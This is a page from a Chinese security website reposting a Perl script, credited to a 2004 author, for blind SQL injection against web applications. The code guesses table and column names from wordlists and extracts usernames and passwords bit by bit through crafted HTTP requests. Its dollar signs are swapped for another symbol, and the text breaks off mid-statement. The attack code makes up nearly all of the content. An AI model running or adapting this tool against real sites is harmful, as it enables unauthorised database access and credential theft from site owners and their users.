关于冰盾 | 使用条款 | 网站地图
 
PERL:多线程+中文破解SQL注入猜解机
PERL:多线程+中文破解SQL注入猜解机
作者:冰盾防火墙 网站:www.bingdun.com 日期:2014-12-15
 

说明:注意请把代码内的所有的∮都替换为$.


#!/usr/local/ActivePerl-5.8/bin/perl -w

use IO::Socket; 
use threads; 
#函数列表; 
sub gethost 
{ 
      if(∮url=~/(http://)?(.+?)/(.+)/) 
      { 
              ∮host=∮2; 
              ∮path=/.∮3; 
              if(∮host=~/(.*):(.*)/) 
              { 
                      ∮host=∮1; 
                      ∮port=∮2; 
              } 
      } 
} 
sub fieInput 
{ 
      my ∮field; 
      open (fieInput,"∮_[0]") or die "cant open file! "; 
      while (chomp(my ∮input=<fieInput>)) 
      { 
              my ∮sql="exists%20(select%20∮input%20from%20∮table_user)"; 
              ∮path1 = "%20AND%20∮sql"; 
              my @res = &connect; 
              if ("@res"=~/∮info/) 
              { 
                      ∮field=∮input; 
                      print " +--  ∮field  --+"; 
                      last; 
              } 
      } 
      close(fieInput); 
      return ∮field; 
}

sub tabInput 
{ 
      my ∮table; 
      open (tabInput,"∮_[0]") or die "cant open file! "; 
      while (chomp(my ∮input=<tabInput>)) 
      { 
              my ∮sql="0<>(select%20count(*)%20from%20∮input)"; 
              ∮path1 = "%20AND%20∮sql"; 
              my @res = &connect; 
              if ("@res"=~/∮info/) 
              { 
                      ∮table=∮input; 
                      print " +--  ∮table  --+ "; 
                      last; 
              } 
      } 
      close(tabInput); 
      return ∮table; 
} 
sub connect 
{ 
      ∮req = "GET ∮path∮path1 HTTP/1.0 ". 
      "Host: ∮host ". 
      "Referer: ∮host ". 
      "Cookie: "; 
      my ∮connection = IO::Socket::INET->new(Proto =>"tcp", 
      PeerAddr =>∮host, 
      PeerPort =>∮port) ││ die "Sorry! Could not connect to ∮host "; 
      print ∮connection ∮req; 
      my @res = <∮connection>; 
      close ∮connection; 
      return @res; 
} 
sub crack 
{ 
my(@dic) = @_; 
my ∮sql=pop(@dic); 
my ∮i=0; 
my ∮op=1; 
my ∮crack; 
foreach my ∮pass(@dic) 
{ 
      print ">"; 
      ∮i++; 
      ∮crack+=∮op*∮pass; 
      ∮path1 = "%20AND%20∮crack<(∮sql)"; 
      my @res = &connect; 
      if ("@res" =~ /∮info/) 
      { 
              ∮op=1; 
              if(∮i==@dic) 
              { 
                      ∮crack++; 
              } 
      } 
      else 
      { 
              ∮op=-1; 
      } 
} 
return ∮crack; 
} 
sub asc 
{ 
      my ∮asc=∮_[0]; 
      my ∮str; 
      if (∮asc<256) 
            { 
            ∮str = pack(C*,∮asc); 
            } 
      else 
      { 
      ∮asc*=-1; 
      ∮str = sprintf("%X",∮asc); 
      if (∮str=~/(.{4})∮/i) 
      { 
              ∮str=∮1; 
      } 
      ∮str = pack("H*",∮str); 
      } 
      return ∮str; 
} 
#初始化变量; 
∮url=; 
∮host=; 
∮path=; 
∮info=; 
∮port=80; 
@dic1=(128,64,32,16,8,4,2,1); 
@dic2=(16,8,4,2,1); 
@dic3=(64,32,16,8,4,2,1); 
@dic4=(16384,8192,4096,2048,1024,512,256,128,64,32,16,8,4,2,1);

print " "; 
print " * The script Crack user&pass for Sql-injection system * "; 
print " * hemon @ East China Jiaotong Univercity , 2004.5 * "; 
print " * E-mail : the108one @ yahoo.com.cn    QQ :24303484 * ";

#取得主机地址、路径; 
∮ARGC = @ARGV; 
∮url = ∮ARGV[0]; 
∮info = ∮ARGV[1]; 
if (∮ARGC != 2) 
{ 
print " * Please input the url : * "; 
chomp(∮url=<STDIN>); 
print " * Please input the infomation : * "; 
chomp(∮info=<STDIN>); 
} 
&gethost; 
print " 开始在 ∮hos
 
 
最新内容:
SQL注入天书 - ASP注入漏洞全接触[2014-12-15]
U-Mail任意文件上传漏洞一枚及修复[2014-12-15]
如何评价XSS在黑客攻防中的地位或重要性?[2014-12-15]
黑客攻防之浅谈WAP网站安全[2014-12-15]
轻松解决盘符打不开的病毒[2014-12-15]
U盘Autorun.inf文件病毒防范技巧[2014-12-15]
相关内容:

合作伙伴: 黑基网 补天科技 威盾科技 站长下载 新飞金信 北京电信 ZOL应用下载
中华人民共和国增值电信业务经营许可证京ICP备14024464 公安备案号 京1081234 
版权所有©2003-2016 冰盾防火墙  www.BingDun.com 法律声明
服务热线:(010)51661195